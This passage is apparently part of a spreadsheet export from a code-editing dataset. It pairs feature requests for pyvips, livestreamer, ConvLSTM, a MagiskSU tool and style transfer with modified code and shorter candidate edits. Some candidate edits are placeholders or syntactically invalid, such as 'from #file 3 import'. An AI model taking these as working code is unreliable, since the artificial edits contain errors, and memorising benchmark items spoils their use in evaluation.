\', \'.join(output_types) + \']\'\n\n        if len(intro.doc_optional_output) &gt; 0:\n            output_types += [\'Dict[str, mixed]\']\n            output_type += \' or list[\' + \', \'.join(output_types) + \']\'\n\n        result += \':rtype: \' + output_type + \'\\n\'\n        result += \':raises Error:\\n\'\n\n        return result\n\n    @staticmethod\n    def generate_sphinx_all():\n        """Generate sphinx documentation.\n\n        This generates a .rst file for all auto-generated image methods. Use it\n        to regenerate the docs with something like::\n\n            $ python -c \\\n"import pyvips; pyvips.Operation.generate_sphinx_all()" &gt; x\n\n        And copy-paste the file contents into doc/vimage.rst in the appropriate\n        place.\n\n        """\n\n        # these names are aliased\n        alias = ["crop"]\n        alias_gtypes = {}\n        for name in alias:\n            gtype = pyvips.type_find("VipsOperation", name)\n            alias_gtypes[gtype] = name\n\n        # all names we can generate docstrings for\n        all_names = []\n\n        def add_name(gtype, a, b):\n            if gtype in alias_gtypes:\n                name = alias_gtypes[gtype]\n            else:\n                name = nickname_find(gtype)\n\n            try:\n                Operation.generate_sphinx(name)\n                all_names.append(name)\n            except Error:\n                pass\n\n            type_map(gtype, add_name)\n\n            return ffi.NULL\n\n        type_map(type_from_name(\'VipsOperation\'), add_name)\n\n        all_names.sort()\n\n        # remove operations we have to wrap by hand\n        exclude = [\'scale\', \'ifthenelse\', \'bandjoin\', \'bandrank\']\n        all_names = [x for x in all_names if x not in exclude]\n\n        # Output summary table\n        print(\'.. class:: Image\')\n        print(\'   :noindex:\\n\')\n        print(\'   .. rubric:: Methods\\n\')\n        print(\'   .. autosummary::\')\n        print(\'      :nosignatures:\\n\')\n        for name in all_names:\n            print(\'      ~{0}\'.format(name))\n        print()\n\n        # Output docs\n        print()\n        for name in all_names:\n            docstr = Operation.generate_sphinx(name)\n            docstr = docstr.replace(\'\\n\', \'\\n      \')\n            print(\'   \' + docstr)\n\n\ndef cache_set_max(mx):\n    """Set the maximum number of operations libvips will cache."""\n    vips_lib.vips_cache_set_max(mx)\n\n\ndef cache_set_max_mem(mx):\n    """Limit the operation cache by memory use."""\n    vips_lib.vips_cache_set_max_mem(mx)\n\n\ndef cache_set_max_files(mx):\n    """Limit the operation cache by number of open files."""\n    vips_lib.vips_cache_set_max_files(mx)\n\n\ndef cache_set_trace(trace):\n    """Turn on libvips cache tracing."""\n    vips_lib.vips_cache_set_trace(trace)\n\n\ndef cache_get_max():\n    """Get the maximum number of operations libvips will cache."""\n    return vips_lib.vips_cache_get_max()\n\n\ndef cache_get_size():\n    """Get the current size of the operations cache."""\n    return vips_lib.vips_cache_get_size()\n\n\ndef cache_get_max_mem():\n    """Get the operation cache limit by memory use."""\n    return vips_lib.vips_cache_get_max_mem()\n\n\ndef cache_get_max_files():\n    """Get the operation cache limit by number of open files."""\n    return vips_lib.vips_cache_get_max_files()\n\n\ndef block_untrusted_set(state):\n    """Set the block state for all untrusted operations."""\n    if at_least_libvips(8, 13):\n        vips_lib.vips_block_untrusted_set(state)\n\n\ndef operation_block_set(name, state):\n    """Set the block state for a named operation."""\n    if at_least_libvips(8, 13):\n        vips_lib.vips_operation_block_set(_to_bytes(name), state)\n\n\n__all__ = [\n    \'Introspect\', \'Operation\',\n    \'cache_set_max\', \'cache_set_max_mem\', \'cache_set_max_files\',\n    \'cache_set_trace\',\n    \'cache_get_max\', \'cache_get_max_mem\', \'cache_get_max_files\',\n    \'cache_get_size\',\n    \'block_untrusted_set\', \'operation_block_set\',\n]'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def call(operation_name, *args, **kwargs):\n    logger.debug(\'VipsOperation.call: operation_name = %s\', operation_name)\n    # logger.debug(\'VipsOperation.call: args = %s, kwargs =%s\',\n    #              args, kwargs)\n\n    intro = Introspect.get(operation_name)\n\n    if len(intro.required_input) != len(args):\n        raise Error(\'{0} needs {1} arguments, but {2} given\'\n                    .format(operation_name,\n                            len(intro.required_input),\n                            len(args)))\n\n    op = Operation.new_from_name(operation_name)\n\n    # set any string options before any args so they can\'t be\n    # overridden\n    string_options = kwargs.pop(\'string_options\', \'\')\n    if not op.set_string(string_options):\n        raise Error(\'unable to call {0}\'.format(operation_name))\n\n    # the first image argument is the thing we expand constants to\n    # match ... look inside tables for images, since we may be passing\n    # an array of images as a single param\n    match_image = _find_inside(lambda x: isinstance(x, pyvips.Image),\n                               args)\n\n    logger.debug(\'VipsOperation.call: match_image = %s\', match_image)\n\n    # collect a list of all input references here\n    # we can\'t use a set because set elements are unique under "==", and\n    # Python checks memoryview equality with hash functions, not pointer\n    # equality\n    references = []\n\n    # does a list contain an element using pointer equality\n    # we can\'t use "in" since that uses "==", which means hash equality\n    def contains(array, x):\n        for y in array:\n            if id(x) == id(y):\n                return True\n        return False\n\n    def add_reference(x):\n        if isinstance(x, pyvips.Image):\n            for i in x._references:\n                if not contains(references, i):\n                    references.append(i)\n        return False\n\n    # set required input args\n    for name, value in zip(intro.required_input, args):\n        _find_inside(add_reference, value)\n        op.set(name, intro.details[name][\'flags\'], match_image, value)\n\n    # set any optional args\n    for name in kwargs:\n        if (name not in intro.optional_input and\n                name not in intro.optional_output):\n            raise Error(\'{0} does not support optional argument {1}\'\n                        .format(operation_name, name))\n\n        value = kwargs[name]\n        details = intro.details[name]\n\n        if (details[\'flags\'] &amp; _DEPRECATED) != 0:\n            logger.info(\'%s argument %s is deprecated\',\n                        operation_name, name)\n\n        _find_inside(add_reference, value)\n        op.set(name, details[\'flags\'], match_image, value)\n\n    # build operation\n    vop = vips_lib.vips_cache_operation_build(op.pointer)\n    if vop == ffi.NULL:\n        vips_lib.vips_object_unref_outputs(op.vobject)\n        raise Error(\'unable to call {0}\'.format(operation_name))\n    op = Operation(vop)\n\n    # attach all input refs to output x\n    def set_reference(x):\n        if isinstance(x, pyvips.Image):\n            x._references.extend(references)\n        return False\n\n    # fetch required output args (plus modified input images)\n    result = []\n    for name in intro.required_output:\n        value = op.get(name)\n        _find_inside(set_reference, value)\n        result.append(value)\n\n    # fetch optional output args\n    opts = {}\n    for name in intro.optional_output:\n        if name in kwargs:\n            value = op.get(name)\n            _find_inside(set_reference, value)\n            opts[name] = value\n\n    if len(opts) &gt; 0:\n        result.append(opts)\n\n    vips_lib.vips_object_unref_outputs(op.vobject)\n\n    if len(result) == 0:\n        result = None\n    elif len(result) == 1:\n        result = result[0]\n\n    logger.debug(\'VipsOperation.call: result = %s\', result)\n\n    return result\n\n#Modify: Update to call new feature function\ndef call_with_new_feature(operation_name, *args, **kwargs):\n    return new_feature_function(operation_name, *args, **kwargs)', '#file 2': "def __init__(self, pointer):\n    # logger.debug('Operation.__init__: pointer = %s', pointer)\n    super(Operation, self).__init__(pointer)\n\n#Modify: Update to use new feature function\ndef new_operation_method(operation_name, *args, **kwargs):\n    return call_with_new_feature(operation_name, *args, **kwargs)", '#file 3': "def new_feature_function(operation_name, *args, **kwargs):\n    # New feature implementation\n    logger.debug('New feature function called for operation: %s', operation_name)\n    # Additional logic for the new feature\n    return Operation.call(operation_name, *args, **kwargs)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': '__version__ variable in livestreamer/__init__.py', 'invoking_code_segment': 'from livestreamer import __version__ as livestreamer_version and its usage in livestreamer/docs/conf.py', 'feature_description': 'Add an extended version string to the documentation that includes build metadata and additional version information beyond the base version number', 'modified_complete_code': '# File 1: livestreamer/src/livestreamer/__init__.py\n__version__ = \'1.12.2\'\n#New\n__version_extended__ = \'1.12.2 (build 2015-01-15)\'\n\n# File 2: livestreamer/docs/conf.py\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nfrom livestreamer import __version__ as livestreamer_version\n#New\nfrom livestreamer import __version_extended__ as livestreamer_version_extended\n\nsys.path.insert(0, os.path.abspath(\'.\'))\n\n# -- General configuration -----------------------------------------------------\n\nextensions = [\'sphinx.ext.autodoc\', \'ext_argparse\', \'ext_github\', \'ext_releaseref\']\n\ntemplates_path = [\'_templates\']\n\nsource_suffix = \'.rst\'\n\nmaster_doc = \'index\'\n\nproject = \'Livestreamer\'\ncopyright = \'2011-2015, Christopher Rosell\'\n\n#Modify\nversion = livestreamer_version\nrelease = livestreamer_version_extended\n\nexclude_patterns = [\'_build\']\n\ngithub_project = \'chrippa/livestreamer\'\n\nsys.path.append(os.path.abspath(\'_themes\'))\n\nhtml_theme_path = [\'_themes\']\nhtml_theme = \'sphinx_rtd_theme_violet\'\nhtml_theme_options = {\n    "oneliner": (\n        "Command-line utility that extracts streams from various services "\n        "and pipes them into a video player of choice."\n    ),\n    "github_user": "chrippa",\n    "github_repo": "livestreamer",\n    "sticky_navigation": True\n}\n\nhtml_static_path = [\'_static\']\n\nhtml_domain_indices = False\n\nhtml_show_sourcelink = False\n\nhtmlhelp_basename = \'livestreamerdoc\'\n\nman_pages = [\n    (\'cli\', \'livestreamer\', \'extracts streams from various services and pipes them into a video player of choice\', [\'Christopher Rosell\'], 1)\n]'}</t>
  </si>
  <si>
    <t>{'#file 1': '#Modify\nfrom livestreamer_extended import get_extended_version\n\n#Modify\nversion = get_extended_version()\nrelease = get_extended_version()', '#file 2': '#Modify\nfrom livestreamer_extended import get_extended_version\n\n#Modify\nversion = get_extended_version()\nrelease = get_extended_version()', '#file 3': '#New\ndef get_extended_version():\n    return f"{livestreamer_version} (Extended)"'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'ConvLSTM class forward method and ConvLSTMCell class', 'invoking_code_segment': 'ConvLSTMNetwork class forward method that calls convlstm.ConvLSTM', 'feature_description': "Add an attention mechanism to the ConvLSTM network to improve the model's ability to focus on relevant parts of the input sequence. This includes implementing a multi-head attention layer that processes the ConvLSTM output sequence to weight different time steps and spatial locations based on their relevance.", 'modified_complete_code': '# File 1: ConvLSTM-Pytorch/convlstm.py\nimport torch.nn as nn\nimport torch\nimport math\n\nclass HadamardProduct(nn.Module):\n    def __init__(self, shape):\n        super(HadamardProduct, self).__init__()\n        self.weights = nn.Parameter(torch.rand(shape)).cuda()\n        \n    def forward(self, x):\n        return x*self.weights\n\n# New: Attention mechanism for ConvLSTM\nclass TemporalAttention(nn.Module):\n    def __init__(self, hidden_dim, num_heads=4):\n        super(TemporalAttention, self).__init__()\n        self.hidden_dim = hidden_dim\n        self.num_heads = num_heads\n        self.head_dim = hidden_dim // num_heads\n        assert hidden_dim % num_heads == 0, "hidden_dim must be divisible by num_heads"\n        \n        self.query = nn.Linear(hidden_dim, hidden_dim)\n        self.key = nn.Linear(hidden_dim, hidden_dim)\n        self.value = nn.Linear(hidden_dim, hidden_dim)\n        self.fc_out = nn.Linear(hidden_dim, hidden_dim)\n        self.scale = math.sqrt(self.head_dim)\n    \n    def forward(self, sequence):\n        # sequence shape: (batch, seq_len, hidden_dim, height, width)\n        batch, seq_len, hidden_dim, height, width = sequence.size()\n        \n        # Reshape for attention: (batch*height*width, seq_len, hidden_dim)\n        sequence_reshaped = sequence.permute(0, 3, 4, 1, 2).contiguous()\n        sequence_reshaped = sequence_reshaped.view(batch*height*width, seq_len, hidden_dim)\n        \n        Q = self.query(sequence_reshaped)\n        K = self.key(sequence_reshaped)\n        V = self.value(sequence_reshaped)\n        \n        # Reshape for multi-head attention\n        Q = Q.view(batch*height*width, seq_len, self.num_heads, self.head_dim).transpose(1, 2)\n        K = K.view(batch*height*width, seq_len, self.num_heads, self.head_dim).transpose(1, 2)\n        V = V.view(batch*height*width, seq_len, self.num_heads, self.head_dim).transpose(1, 2)\n        \n        # Attention scores\n        scores = torch.matmul(Q, K.transpose(-2, -1)) / self.scale\n        attention_weights = torch.softmax(scores, dim=-1)\n        \n        # Apply attention to values\n        context = torch.matmul(attention_weights, V)\n        context = context.transpose(1, 2).contiguous()\n        context = context.view(batch*height*width, seq_len, hidden_dim)\n        \n        # Final linear layer\n        output = self.fc_out(context)\n        output = output.view(batch, height, width, seq_len, hidden_dim)\n        output = output.permute(0, 3, 4, 1, 2).contiguous()\n        \n        return output\n\nclass ConvLSTMCell(nn.Module):\n    def __init__(self, img_size, input_dim, hidden_dim, kernel_size, \n                 cnn_dropout, rnn_dropout, bias=True, peephole=False,\n                 layer_norm=False):\n        super(ConvLSTMCell, self).__init__()\n        self.input_shape = img_size\n        self.input_dim = input_dim\n        self.hidden_dim = hidden_dim\n        self.kernel_size = kernel_size\n        self.padding = (int(self.kernel_size[0]/2), int(self.kernel_size[1]/2))\n        self.stride = (1, 1)\n        self.bias = bias\n        self.peephole = peephole\n        self.layer_norm = layer_norm\n        \n        self.out_height = int((self.input_shape[0] - self.kernel_size[0] + 2*self.padding[0])/self.stride[0] + 1)\n        self.out_width = int((self.input_shape[1] - self.kernel_size[1] + 2*self.padding[1])/self.stride[1] + 1)\n        \n        self.input_conv = nn.Conv2d(in_channels=self.input_dim, out_channels=4*self.hidden_dim,\n                                  kernel_size=self.kernel_size,\n                                  stride = self.stride,\n                                  padding=self.padding,\n                                  bias=self.bias)\n        self.rnn_conv = nn.Conv2d(self.hidden_dim, out_channels=4*self.hidden_dim, \n                                  kernel_size = self.kernel_size,\n                                  padding=(math.floor(self.kernel_size[0]/2), \n                                         math.floor(self.kernel_size[1]/2)),\n                                  bias=self.bias)\n        \n        if self.peephole is True:\n            self.weight_ci = HadamardProduct((1, self.hidden_dim, self.out_height, self.out_width))\n            self.weight_cf = HadamardProduct((1, self.hidden_dim, self.out_height, self.out_width))\n            self.weight_co = HadamardProduct((1, self.hidden_dim, self.out_height, self.out_width))\n            self.layer_norm_ci = nn.LayerNorm([self.hidden_dim, self.out_height, self.out_width])\n            self.layer_norm_cf = nn.LayerNorm([self.hidden_dim, self.out_height, self.out_width])\n            self.layer_norm_co = nn.LayerNorm([self.hidden_dim, self.out_height, self.out_width])\n        \n        self.cnn_dropout = nn.Dropout(cnn_dropout)\n        self.rnn_dropout = nn.Dropout(rnn_dropout)\n        \n        self.layer_norm_x = nn.LayerNorm([4*self.hidden_dim, self.out_height, self.out_width])\n        self.layer_norm_h = nn.LayerNorm([4*self.hidden_dim, self.out_height, self.out_width])\n        self.layer_norm_cnext = nn.LayerNorm([self.hidden_dim, self.out_height, self.out_width])\n    \n    def forward(self, input_tensor, cur_state):\n        h_cur, c_cur = cur_state\n        x = self.cnn_dropout(input_tensor)\n        x_conv = self.input_conv(x)\n        if self.layer_norm is True:\n            x_conv = self.layer_norm_x(x_conv)\n        x_i, x_f, x_c, x_o = torch.split(x_conv, self.hidden_dim, dim=1)\n        \n        h = self.rnn_dropout(h_cur)\n        h_conv = self.rnn_conv(h)\n        if self.layer_norm is True:\n            h_conv = self.layer_norm_h(h_conv)\n        h_i, h_f, h_c, h_o = torch.split(h_conv, self.hidden_dim, dim=1)\n        \n        if self.peephole is True:\n            f = torch.sigmoid((x_f + h_f) +  self.layer_norm_cf(self.weight_cf(c_cur)) if self.layer_norm is True else self.weight_cf(c_cur))\n            i = torch.sigmoid((x_i + h_i) +  self.layer_norm_ci(self.weight_ci(c_cur)) if self.layer_norm is True else self.weight_ci(c_cur))\n        else:\n            f = torch.sigmoid((x_f + h_f))\n            i = torch.sigmoid((x_i + h_i))\n        \n        g = torch.tanh((x_c + h_c))\n        c_next = f * c_cur + i * g\n        if self.peephole is True:\n            o = torch.sigmoid(x_o + h_o + self.layer_norm_co(self.weight_co(c_cur)) if self.layer_norm is True else self.weight_co(c_cur))\n        else:\n            o = torch.sigmoid((x_o + h_o))\n        \n        if self.layer_norm is True:\n            c_next = self.layer_norm_cnext(c_next)\n        h_next = o * torch.tanh(c_next)\n        return h_next, c_next\n\n    def init_hidden(self, batch_size):\n        height, width = self.out_height, self.out_width\n        return (torch.zeros(batch_size, self.hidden_dim, height, width, device=self.input_conv.weight.device),\n                torch.zeros(batch_size, self.hidden_dim, height, width, device=self.input_conv.weight.device))\n\nclass ConvLSTM(nn.Module):\n    def __init__(self, img_size, input_dim, hidden_dim, kernel_size,\n                 cnn_dropout=0.5, rnn_dropout=0.5,  \n                 batch_first=False, bias=True, peephole=False,\n                 layer_norm=False,\n                 return_sequence=True,\n                 bidirectional=False,\n                 use_attention=False):\n        super(ConvLSTM, self).__init__()\n        print(kernel_size)\n        self.batch_first = batch_first\n        self.return_sequence = return_sequence\n        self.bidirectional = bidirectional\n        self.use_attention = use_attention\n        \n        cell_fw = ConvLSTMCell(img_size = img_size,\n                                 input_dim=input_dim,\n                                 hidden_dim=hidden_dim,\n                                 kernel_size=kernel_size,\n                                 cnn_dropout=cnn_dropout,\n                                 rnn_dropout=rnn_dropout,\n                                 bias=bias,\n                                 peephole=peephole,\n                                 layer_norm=layer_norm)\n        self.cell_fw = cell_fw\n        \n        if self.bidirectional is True:\n            cell_bw = ConvLSTMCell(img_size = img_size,\n                                     input_dim=input_dim,\n                                     hidden_dim=hidden_dim,\n                                     kernel_size=kernel_size,\n                                     cnn_dropout=cnn_dropout,\n                                     rnn_dropout=rnn_dropout,\n                                     bias=bias,\n                                     peephole=peephole,\n                                     layer_norm=layer_norm)\n            self.cell_bw = cell_bw\n        \n        # Modify: Add attention mechanism\n        if self.use_attention:\n            self.attention = TemporalAttention(hidden_dim, num_heads=4)\n\n    def forward(self, input_tensor, hidden_state=None):\n        if not self.batch_first:\n            input_tensor = input_tensor.permute(1, 0, 2, 3, 4)\n\n        b, seq_len, _, h, w = input_tensor.size()\n\n        if hidden_state is not None:\n            raise NotImplementedError()\n        else:\n            hidden_state, hidden_state_inv = self._init_hidden(batch_size=b)\n\n        ## LSTM forward direction\n        input_fw = input_tensor\n        h, c = hidden_state\n        output_inner = []\n        for t in range(seq_len):\n            h, c = self.cell_fw(input_tensor=input_fw[:, t, :, :, :],\n                                             cur_state=[h, c])\n            output_inner.append(h)\n        output_inner = torch.stack((output_inner), dim=1)\n        \n        # Modify: Apply attention to output sequence\n        if self.use_attention:\n            output_inner = self.attention(output_inner)\n        \n        layer_output = output_inner\n        last_state = [h, c]\n        \n        ## LSTM inverse direction\n        if self.bidirectional is True:\n            input_inv = input_tensor\n            h_inv, c_inv = hidden_state_inv\n            output_inv = []\n            for t in range(seq_len-1, -1, -1):\n                h_inv, c_inv = self.cell_bw(input_tensor=input_inv[:, t, :, :, :],\n                                                 cur_state=[h_inv, c_inv])\n                output_inv.append(h_inv)\n            output_inv.reverse() \n            output_inv = torch.stack((output_inv), dim=1)\n            \n            # Modify: Apply attention to inverse output sequence\n            if self.use_attention:\n                output_inv = self.attention(output_inv)\n            \n            layer_output = torch.cat((output_inner, output_inv), dim=2)\n            last_state_inv = [h_inv, c_inv]\n        \n        return layer_output if self.return_sequence is True else layer_output[:, -1:], last_state, last_state_inv if self.bidirectional is True else None\n\n    def _init_hidden(self, batch_size):\n        init_states_fw = self.cell_fw.init_hidden(batch_size)\n        init_states_bw = None\n        if self.bidirectional is True:\n            init_states_bw = self.cell_bw.init_hidden(batch_size)\n        return init_states_fw, init_states_bw\n\n# File 2: ConvLSTM-Pytorch/convlstm_decoder.py\nimport torch\nimport convlstm\nimport config\n\nclass Flatten(torch.nn.Module):\n    def forward(self, input):\n        b, seq_len, _, h, w = input.size()\n        return input.view(b, seq_len, -1)\n\nclass ConvLSTMNetwork(torch.nn.Module):\n    def __init__(self, img_size_list, input_channel, hidden_channels, kernel_size, num_layers, bidirectional=False, use_attention=False):\n        super(ConvLSTMNetwork, self).__init__()\n        \n        self.hidden_channels = hidden_channels\n        self.num_layers = num_layers\n        self.bidirectional = bidirectional\n        self.use_attention = use_attention\n        \n        convlstm_layer = []\n        for i in range(num_layers):\n            # Modify: Pass use_attention parameter to ConvLSTM\n            layer = convlstm.ConvLSTM(img_size_list[i],\n                                    input_channel, \n                                    hidden_channels[i],\n                                    kernel_size[i],\n                                    0.2, 0.,\n                                    batch_first=True, \n                                    bias=True, \n                                    peephole=True,\n                                    layer_norm=True,\n                                    return_sequence=config.SEQUENCE_OUTPUT,\n                                    bidirectional=self.bidirectional,\n                                    use_attention=self.use_attention)\n            convlstm_layer.append(layer)\n            input_channel = hidden_channels[i] * (2 if self.bidirectional else 1)\n           \n        self.convlstm_layer = torch.nn.ModuleList(convlstm_layer)\n        self.flatten = Flatten()\n        self.linear2 = torch.nn.Linear(hidden_channels[-1]*(2 if self.bidirectional else 1)*16, 2)\n    \n    def forward(self, x):\n        input_tensor = x\n        for i in range(self.num_layers):\n            input_tensor, _, _ = self.convlstm_layer[i](input_tensor)\n       \n        out_flatten = self.flatten(input_tensor)\n        output = self.linear2(out_flatten)\n        return output'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class ConvLSTM(nn.Module):\n    def __init__(self, img_size, input_dim, hidden_dim, kernel_size,\n                 cnn_dropout=0.5, rnn_dropout=0.5,  \n                 batch_first=False, bias=True, peephole=False,\n                 layer_norm=False,\n                 return_sequence=True,\n                 bidirectional=False):\n        super(ConvLSTM, self).__init__()\n        ...\n    def forward(self, input_tensor, hidden_state=None):\n        ...\n        return layer_output if self.return_sequence is True else layer_output[:, -1:], last_state, last_state_inv if self.bidirectional is True else None', '#file 2': 'class ConvLSTMNetwork(torch.nn.Module):\n    def __init__(self, img_size_list, input_channel, hidden_channels, kernel_size, num_layers, bidirectional = False):\n        ...\n        convlstm_layer = []\n        for i in range(num_layers):\n            layer = convlstm.ConvLSTM(img_size_list[i],\n                                    input_channel, \n                                    hidden_channels[i],\n                                    kernel_size[i],\n                                    0.2, 0.,\n                                    batch_first=True, \n                                    bias=True, \n                                    peephole=True,\n                                    layer_norm=True,\n                                    return_sequence=config.SEQUENCE_OUTPUT,\n                                    bidirectional=self.bidirectional)\n            convlstm_layer.append(layer)\n            ...\n        self.attention = AttentionMechanism(hidden_channels[-1] * (2 if bidirectional else 1)) #New\n    def forward(self, x):\n        ...\n        for i in range(self.num_layers):\n            input_tensor, _, _ = self.convlstm_layer[i](input_tensor)\n        ...\n        context_vector = self.attention(input_tensor) #New\n        out_flatten = self.flatten(context_vector) #Modify\n        output = self.linear2(out_flatten)\n        return output', '#file 3': 'class AttentionMechanism(nn.Module):\n    def __init__(self, hidden_dim):\n        super(AttentionMechanism, self).__init__()\n        self.hidden_dim = hidden_dim\n        self.attention_weights = nn.Linear(hidden_dim, 1)\n\n    def forward(self, encoder_outputs):\n        # encoder_outputs shape: (batch_size, seq_len, hidden_dim)\n        attn_weights = self.attention_weights(encoder_outputs)\n        attn_weights = torch.softmax(attn_weights, dim=1)\n        context_vector = torch.bmm(attn_weights.transpose(1, 2), encoder_outputs)\n        return context_vector.squeeze(1)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def get_app_name(uid):\n    """ Get the name of app (not the package name) by uid from MagiskSu database """\n    if not SULOGS_DB:\n        return ""\n    r = _wrap_usqlite(\n        SULOGS_DB,\n        "SELECT %s FROM logs WHERE %s=? LIMIT 1" % (SULOGS_LABEL_APPNAME, SULOGS_LABEL_FROMUID),\n        (uid,)\n    )\n    if not r:\n        return ""\n    return r[0][0]', 'invoking_code_segment': 'for package_name, uid in saved_package_name_uid:\n            app_name = get_app_name(uid)\n            if app_name:\n                app_name = " (%s)" % app_name\n            f.write(\'                "%s%s", "uid: %s", 0,\\n\' % (package_name, app_name, uid))', 'feature_description': 'Add the ability to display app icons next to app names in the MagiskSU apps list by retrieving icon data from the MagiskSu database and passing it to the edify template for rendering.', 'modified_complete_code': '#file 1: control_sqlite.py\n\n#Modify - Updated function to return both app name and icon data\ndef get_app_name(uid):\n    """ Get the name of app (not the package name) by uid from MagiskSu database """\n    if not SULOGS_DB:\n        return ""\n    r = _wrap_usqlite(\n        SULOGS_DB,\n        "SELECT %s FROM logs WHERE %s=? LIMIT 1" % (SULOGS_LABEL_APPNAME, SULOGS_LABEL_FROMUID),\n        (uid,)\n    )\n    if not r:\n        return ""\n    return r[0][0]\n\n#New - Added function to retrieve app icon by uid\ndef get_app_icon(uid):\n    """ Get the icon of app by uid from MagiskSu database """\n    if not SULOGS_DB:\n        return ""\n    try:\n        r = _wrap_usqlite(\n            SULOGS_DB,\n            "SELECT icon FROM logs WHERE %s=? LIMIT 1" % SULOGS_LABEL_FROMUID,\n            (uid,)\n        )\n        if not r:\n            return ""\n        return r[0][0]\n    except:\n        return ""\n\n#New - Added function to retrieve both app name and icon\ndef get_app_name_and_icon(uid):\n    """ Get the name and icon of app by uid from MagiskSu database """\n    if not SULOGS_DB:\n        return "", ""\n    try:\n        r = _wrap_usqlite(\n            SULOGS_DB,\n            "SELECT %s, icon FROM logs WHERE %s=? LIMIT 1" % (SULOGS_LABEL_APPNAME, SULOGS_LABEL_FROMUID),\n            (uid,)\n        )\n        if not r:\n            return "", ""\n        return r[0][0], r[0][1]\n    except:\n        return "", ""\n\n---\n\n#file 2: _gen_magisksu_apps_edify.py\n\nfrom common import MMRT_PATH, MAGISK_VER_CODE, get_package_name_by_uid\nfrom control_sqlite import (\n    get_app_name, get_saved_package_name_uid_policy, get_saved_uid_policy, get_app_name_and_icon #Modify - Added import for new function\n)\n\nAC_3 = "%s/template/META-INF/com/google/android/aroma/magisksu_apps.edify" % MMRT_PATH\n\ndef _get_saved_package_name_uid():\n    if MAGISK_VER_CODE &lt; 24305:\n        return [(package_name, uid) for package_name, uid, _ in get_saved_package_name_uid_policy()]\n    else:\n        return [(get_package_name_by_uid(uid), uid) for uid, _ in get_saved_uid_policy()]\n\nwith open(AC_3, "w", encoding="utf-8") as f:\n    f.write(\'\'\'\n            checkbox(\n                "Root manager",\n                "Check the box to grant superuser rights, otherwise denied.",\n                "@welcome",\n                "magisksu_apps.prop",\n    \'\'\')\n    f.write("\\n")\n\n    saved_package_name_uid = _get_saved_package_name_uid()\n    if not saved_package_name_uid:\n        f.write(\'                "Seem you have not given rights for any app", "", 2,\\n\')\n    else:\n        for package_name, uid in saved_package_name_uid:\n            #Modify - Updated to retrieve both app name and icon\n            app_name, app_icon = get_app_name_and_icon(uid)\n            if app_name:\n                app_name = " (%s)" % app_name\n            #New - Added icon data to the edify output\n            icon_data = " [icon: %s]" % app_icon if app_icon else ""\n            f.write(\'                "%s%s%s", "uid: %s", 0,\\n\' % (package_name, app_name, icon_data, uid))\n\n    f.write(\'\'\'\n                "", "", 3\n            );\n        \'\'\'\n    )\n    f.write("\\n")'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def _get_saved_package_name_uid():\n    if MAGISK_VER_CODE &lt; 24305:\n        return [(package_name, uid) for package_name, uid, _ in get_saved_package_name_uid_policy()]\n    else:\n        return [(get_package_name_by_uid(uid), uid) for uid, _ in get_saved_uid_policy()]\n\n#Modify: Include icon retrieval\nfrom #file 3 import get_app_icon\ndef _get_saved_package_name_uid_with_icon():\n    return [(package_name, uid, get_app_icon(package_name)) for package_name, uid in _get_saved_package_name_uid()]', '#file 2': 'with open(AC_3, "w", encoding="utf-8") as f:\n    f.write(\'\'\'...\'\'\')\n    f.write("\\n")\n\n    saved_package_name_uid = _get_saved_package_name_uid_with_icon()\n    if not saved_package_name_uid:\n        f.write(\'                "Seem you have not given rights for any app", "", 2,\\n\')\n    else:\n        for package_name, uid, icon in saved_package_name_uid:\n            app_name = get_app_name(uid)\n            if app_name:\n                app_name = " (%s)" % app_name\n            f.write(\'                "%s%s", "uid: %s, icon: %s", 0,\\n\' % (package_name, app_name, uid, icon))\n\n    f.write(\'\'\'...\'\'\')\n    f.write("\\n")', '#file 3': '#New: Function to fetch app icons\ndef get_app_icon(package_name):\n    # Placeholder for future implementation to fetch app icons\n    return "icon_placeholder.png"'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def preprocess(image):\n    return image - MEAN_PIXEL', 'invoking_code_segment': 'X_pre = vgg.preprocess(X_content)\n...\npreds_pre = vgg.preprocess(preds)', 'feature_description': 'Add noise to the input image before processing it through the network to improve robustness and regularization during style transfer training', 'modified_complete_code': '# vgg.py modifications:\n\nMEAN_PIXEL = np.array([ 123.68 ,  116.779,  103.939])\n\n# New: Add noise parameter to preprocess function\ndef preprocess(image, add_noise=False, noise_std=0.1):\n    # Modify: Original preprocessing with optional noise addition\n    preprocessed = image - MEAN_PIXEL\n    if add_noise:\n        # New: Add Gaussian noise to the preprocessed image\n        noise = np.random.normal(0, noise_std, preprocessed.shape)\n        preprocessed = preprocessed + noise\n    return preprocessed\n\n# New: Helper function to add noise directly to image\ndef add_gaussian_noise(image, noise_std=0.1):\n    noise = np.random.normal(0, noise_std, image.shape)\n    return image + noise\n\n---\n\n# optimize.py modifications:\n\n# Modify: Update the preprocess calls to include noise addition\nwith tf.Graph().as_default(), tf.compat.v1.Session() as sess:\n    X_content = tf.compat.v1.placeholder(tf.float32, shape=batch_shape, name="X_content")\n    # Modify: Add noise to input before preprocessing\n    X_noisy = tf.py_function(func=lambda x: vgg.add_gaussian_noise(x.numpy(), noise_std=0.1), inp=[X_content], Tout=tf.float32)\n    X_pre = vgg.preprocess(X_noisy)\n\n    # precompute content features\n    content_features = {}\n    content_net = vgg.net(vgg_path, X_pre)\n    content_features[CONTENT_LAYER] = content_net[CONTENT_LAYER]\n\n    if slow:\n        preds = tf.Variable(\n            tf.random.normal(X_content.get_shape()) * 0.256\n        )\n        preds_pre = preds\n    else:\n        preds = transform.net(X_content/255.0)\n        # Modify: Add noise to predictions before preprocessing\n        preds_noisy = tf.py_function(func=lambda x: vgg.add_gaussian_noise(x.numpy(), noise_std=0.05), inp=[preds], Tout=tf.float32)\n        preds_pre = vgg.preprocess(preds_noisy)\n\n    net = vgg.net(vgg_path, preds_pre)\n    # ... rest of the code remains the same'}</t>
  </si>
  <si>
